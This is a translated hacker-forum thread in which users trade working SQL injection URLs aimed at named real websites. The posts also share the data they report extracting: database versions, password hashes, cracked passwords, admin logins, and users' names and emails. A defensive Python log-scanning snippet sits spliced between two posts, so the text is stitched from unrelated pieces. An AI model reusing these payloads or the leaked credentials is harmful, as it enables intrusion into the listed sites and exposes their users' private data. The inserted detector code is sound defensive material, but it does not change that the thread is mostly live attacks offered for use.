SQL Injections

Discussion in 'Vulnerabilities' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. Lamersha

    4.1.22
    telgaz_db
    [email protected]
    http://9955599.ru/mo_job.php?mo=sect&Id=-19+UNION+SELECT+1,2/*
     
    2 people like this.
  2. ЛифчиС5СВ

    http://www.naturamunda.lt
    Code:
    http://www.naturamunda.lt/index.php?page=news.php&id=99'+union+select+1,user(),3,4,5,6,version(),8,9/*
    tarpininka_nm@localhost
    5.0.45-community-log


    Moving on:
    Code:
    http://www.naturamunda.lt/index.php?page=news.php&id=99'+union+select+1,user(),3,4,5,6,TABLE_NAME,8,9+from+INFORMATION_SCHEMA.TABLES/*
    30 tables, among them:
    users_db
    personalas
    user_privileges
    and others.


    http://sperling-coll.dk
    Code:
    http://sperling-coll.dk/?filenavn=varer.php4&traeid=-1+union+select+concat_ws(char(58),user(),version(),database())/*
    And read the title:
    Sperling - root@localhost:5.0.27:dbsperlingNY
    I think there shouldn't be any problems =)

    And here's one for you to chew on:
    Code:
    http://www.hajosalfred.hu/eng/news.php?id=-1+union+select+1,2,3,4,5+--+
    =)
     
  3. MegaBits

    Code:
    http://www.milon.ru/index.phtml?id=-6+union+select+1,LOAD_FILE(char(47,101,116,99,47,112,97,115,115,119,100)),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/*

    Code:
    http://www.milon.ru/index.phtml?id=-6+union+select+1,AES_DECRYPT(AES_ENCRYPT(USER(),0x71),0x71),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/*
    I couldn't pull the root hash.
     
  4. Kakoytoxaker

    MegaBits
    Here's root, but just like in my previous post, not everything is clear
    root:032c41e8435273a7 =letmein
    Query:
    _http://www.milon.ru/index.phtml?id=-6+union+select+1,AES_DECRYPT(AES_ENCRYPT(user,0x71),0x71),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+mysql.user+limit+3,10/*
    either user or password, not both together
     
    1 person likes this.
  5. BizzyD

    Code:
    http://www.omantribune.com/index.php?page=news&id=99999+union+select+1,2,3,4,5,6,7,8,9/*
    [email protected]:omantribune:4.1.22-max-log



    Code:
    http://www.turkystan.kz/page.php?page_id=14&number_id=99999+union+select+1,2,3,4/*
    turkesdb@hosting:turkesdb:4.1.22
     
    1 person likes this.
  6. MegaBits

    Code:
    http://www.m-logos.ru/seminars/info.phtml?id=-727+union+select+1,2,3,4,concat_ws(char(58),user(),version()%20%20,database()),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/*
    [email protected]:4.0.27-log:mlogos
     
  7. samarin

    Just learning!!!
    shop notebook.dn.ua

    Code:
    http://notebook.dn.ua/?brand=-78/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,concat(database(),0x3a,version(),0x3a,user())/*
    godnua_newmarket:4.1.20:godnua_mark@localhost

    Code:
    http://notebook.dn.ua/?brand=-78/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,concat(fio,0x3a,mail)/**/from/**/users/*
    -------------------------------------------------
    there are more tables there, but the names need to be guessed
     
    #4987 samarin, 6 Mar 2008
    Last edited: 6 Mar 2008
    2 people like this.
  8. gibson

    arm.st.uz
    _http://arm.st.uz/index.php?m=news&id=-1+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5--
    4.1.19-log:arm@localhost:arm
    admin:70222949cc0db89ab32c9969754d4758 pass:1290
    sk:70222949cc0db89ab32c9969754d4758 pass:1290
    arm:5bbc7cc2da7217ccaf66f733b3fef728 pass:11183 [email protected] pass:11183

    it won't let me into the admin panel, access is bound to an IP
     
    1 person likes this.
  9. Lamersha

    http://9955599.ru/jobsect.php?section=-5+union+select+null,version()/*
    [email protected]/4.1.22/telgaz_db
    if anyone digs into it, please write, I couldn't get any further((
     
    1 person likes this.
  10. krypt3r

    Lamersha, in my opinion there's nothing interesting there
    Code:
    resume
      id
      name
      pay
      mark
      date
      city
      section
      age
    vacancy
      id
    city
    section
    
    Though who knows, I'm too lazy to dig further =)
     
  11. sD0S

    PRIAMOS is a powerful SQL Injector & Scanner

    www.priamos-project.com/whatis.htm
     
  12. truelamer

    http://www.dixis.kz/index.php?shownews=true&nid=all&cat=-1+union+select+1,2,concat(version(),char(58),user(),char(58),database()),4,5,6,7,8,9,10+/*

    4.1.22-standard-log
    dixis_user@localhost
    dixis_shop
     
  13. gibson

    upc.edu
    http://www.upc.edu/tercercicle/estudis/index_ambit.php?id_ambit=-1+union+select+1,2,3,4,concat_ws(0x3a,version(),user(),database())/*
    4.0.24_Debian-10sarge1-log:intranet@localhost:tercercicle intranet@localhost

    Well, I can finish working these SQL injections; there seems to be output, but it doesn't want to show the info
    library.uiuc.edu
    http://www.library.uiuc.edu/agx/agnic/soynic/info.php?id=-1'+union+select+123--

    spo.princeton.edu
    http://spo.princeton.edu/index.php?id=-1'+or+1=1/*

    ethology.ru
    5.0.45-log:[email protected]:u12802
     
    #4993 gibson, 6 Mar 2008
    Last edited: 6 Mar 2008
  14. Kakoytoxaker

    2 gibson

    First one:

    _http://www.library.uiuc.edu/agx/agnic/soynic/info.php?id=-1'+union+select+@@version--

    Microsoft SQL Server 2005 - 9.00.3054.00 (X64) Mar 23 2007 18:41:50 Copyright (c) 1988-2005 Microsoft Corporation Standard Edition (64-bit) on Windows NT 5.2 (Build 3790: Service Pack 2)

    _http://www.library.uiuc.edu/agx/agnic/soynic/info.php?id=-1'+union+select+table_name+from+information_schema.tables--

    SoyLinks
    NewLinksSoy
    NewLinksCorn

    _http://www.library.uiuc.edu/agx/agnic/soynic/info.php?id=-1'+union+select+table_name+from+information_schema.tables+WHERE+TABLE_NAME+NOT+IN+('SoyLinks','NewLinksSoy')--
    etc., I'm too lazy to go further
    ---------------------------
    second one: mysql

    _http://spo.princeton.edu/index.php?id=1'+order+by+23/*

    Most likely two SELECTs, 23 columns, but via UNION it complains:

    The used SELECT statements have a different number of columns

    i.e. subqueries
     
    #4994 Kakoytoxaker, 6 Mar 2008
    Last edited: 6 Mar 2008
    3 people like this.
  15. vp$

    http://www.cyberbody.ru/shop.php?catid=1121000000000+UNION+SELECT+1,concat_ws(0x3a,username,user_password,user_email,user_icq),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32+from+phpbb2_users/*
    all the bodybuilders on one page)))
     
  16. neon_fx

    http://www.nsastutter.org/content/index.php?catid=-52/**/union/**/select/**/1,concat_ws(0x3a,User(),Database(),Version()),3,4,5/*

    [email protected]
    stutter
    4.0.25-standard-log
     
    #4996 neon_fx, 7 Mar 2008
    Last edited: 7 Mar 2008
  17. beerhack

    Kiev Rock Club
    http://www.rock.kiev.ua/arhiv/id.php?id=-99999+union+select+1,2,3,concat_ws(0x3a,id,login,password,fname,lname,email),5,6,7,8,9,10,11+from+users/*

    USER: rock@localhost
    VERSION: 5.0.32-Debian_7etch5-log
    DATABASE: rock

    1: DR-1:AkbcA:Ремиш:Дмитрий:[email protected]
    28:YK-1:nbyedbtkm:Юлия:Коломиец:[email protected]
    1657:YK-10:7qOAjTq6dN26udL:Комаров:Юрий:[email protected]

    Registration and the admin panel are here:
    http://www.rock.kiev.ua/kontakt/index.php
     
    #4997 beerhack, 7 Mar 2008
    Last edited: 8 Mar 2008
    1 person likes this.
  18. sD0S

    [PNphpBB2]
    table pn_phpbb_users:
    _http://albireo.lt/index.php?name=PNphpBB2&file=index&c=9999/**/union/**/select/**/5,table_name,5,5,5/**/from/**/information_schema.tables/**/where/**/table_schema=database()/**/and/**/table_name/**/like/**/0x257573657225/**/limit/**/3,1/*

    column username:
    _http://albireo.lt/index.php?name=PNphpBB2&file=index&c=9999/**/union/**/select/**/5,column_name,5,5,5/**/from/**/information_schema.columns/**/where/**/table_name=0x706E5F70687062625F7573657273/**/and/**/column_name/**/like/**/0x257573657225/**/limit/**/1,1/*

    column user_password:
    _http://albireo.lt/index.php?name=PNphpBB2&file=index&c=9999/**/union/**/select/**/5,column_name,5,5,5/**/from/**/information_schema.columns/**/where/**/table_name=0x706E5F70687062625F7573657273/**/and/**/column_name/**/like/**/0x257061737325/**/limit/**/0,1/*

    THE END:
    _http://albireo.lt/index.php?name=PNphpBB2&file=index&c=9999/**/union/**/select/**/5,concat(0x3C62722F3E,0x6964,0x3A,user_id,0x3C62722F3E,0x75736572,0x3A,username,0x3C62722F3E,0x70617373,0x3A,user_password),5,5,5/**/from/**/pn_phpbb_users/**/WHERE/**/user_id=2/*
     
    1 person likes this.
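The requests quoted in this thread share a few markers that survive in web server logs: `+` or `/**/` in place of spaces, `0x…` and `char(…)` in place of quoted strings, and a trailing `/*` or `--`. The following is an added example, not part of the original thread: a log triage helper that undoes those encodings and tags each request. The rule names, sample log lines and addresses are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Rule names are this example's own; patterns cover the request shapes quoted above.
RULES = {
    "union_select": re.compile(r"\bunion\s+(all\s+)?select\b"),
    "schema_enum": re.compile(r"\binformation_schema\.(tables|columns)\b"),
    "mysql_user": re.compile(r"\bfrom\s+mysql\.user\b"),
    "file_read": re.compile(r"\bload_file\s*\("),
    "fingerprint": re.compile(r"@@version|\b(version|user|database)\s*\(\s*\)"),
    "column_probe": re.compile(r"\border\s+by\s+\d+"),
    "comment_tail": re.compile(r"(/\*|--)\s*$"),
}
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) [^"]*" (\d{3})')

def _hex(m):   # 0x257573657225 -> '%user%'
    return "'" + bytes.fromhex(m.group(1)).decode("latin-1") + "'"

def _char(m):  # char(47,101,116,99) -> '/etc'
    return "'" + "".join(chr(int(n)) for n in m.group(1).split(",")) + "'"

def normalize(query):
    """Undo the encodings used to hide keywords and string literals."""
    q = unquote_plus(query).lower()        # '+' and %20 become spaces
    q = re.sub(r"/\*.*?\*/", " ", q)       # /**/ standing in for whitespace
    q = re.sub(r"\b0x((?:[0-9a-f]{2})+)\b", _hex, q)
    q = re.sub(r"\bchar\(\s*(\d{1,3}(?:\s*,\s*\d{1,3})*)\s*\)", _char, q)
    return re.sub(r"\s+", " ", q).strip()

def classify(query):
    q = normalize(query)
    return sorted(name for name, rx in RULES.items() if rx.search(q))

def scan(lines):
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        tags = classify(urlsplit(m.group(2)).query)
        if "union_select" in tags or len(tags) >= 2:
            hits.append((m.group(1), m.group(3), tags))  # (client, status, tags)
    return hits

SAMPLE_LOG = [  # constructed lines in combined log format
    '198.51.100.7 - - [06/Mar/2008:10:01:02 +0000] "GET /news.php?id=42 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [06/Mar/2008:10:02:10 +0000] "GET /news.php?id=1\'+order+by+23/* HTTP/1.1" 200 812',
    '203.0.113.9 - - [06/Mar/2008:10:02:31 +0000] "GET /news.php?id=-1/**/union/**/select/**/1,table_name,3/**/from/**/information_schema.tables/**/where/**/table_name/**/like/**/0x257573657225/* HTTP/1.1" 200 930',
    '203.0.113.9 - - [06/Mar/2008:10:03:05 +0000] "GET /news.php?id=-1+union+select+1,load_file(char(47,101,116,99,47,112,97,115,115,119,100)),3-- HTTP/1.1" 200 2048',
]
```

A hit is a triage signal rather than proof of compromise. The application-side fix for every request shape above is the same: bind the `id`-style parameters through parameterized queries instead of concatenating them into SQL.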
  19. Saint-Sky

    For Metallica "fans"...

    www.metpage.de

    metnews@localhost:5.0.20-max-log:metnews

    The wn_user table is accessible:

    Tommy:3fac1eead50fcb46ec56e0df6452251e:suku3s43
    FrayedEnd:455018c4669f687ff757ffd4be3045cb:sebsucks
    TheUnforgivenII:e93ac9964ed9c0444cfbfa9f8a26429a:metfan6
    Elloy:c76f54e8d0db01297ac7a2e47be4cf13

    P.S. I decrypted the passwords using md5.xek.cc, enjoy...
     
    1 person likes this.
  20. truelamer

    http://www.vmo.kz/?start=news&id=-1+union+select+1,2,3,CONCAT(user(),char(58),version(),char(58),database()),5,6,7,8,9,10,11,12,13,14,15+from+admin/*

    vmovkkz_1@localhost
    4.1.22-standard-log
    vmovkkz_1
    ---------------------------------------------------

    http://www.vmo.kz/?start=news&id=-1+union+select+1,2,3,CONCAT(id,char(58),login,char(58),password),5,6,7,8,9,10,11,12,13,14,15+from+admin/*

    id:1
    login:admin
    password:admin

    http://www.vmo.kz/admin.php
     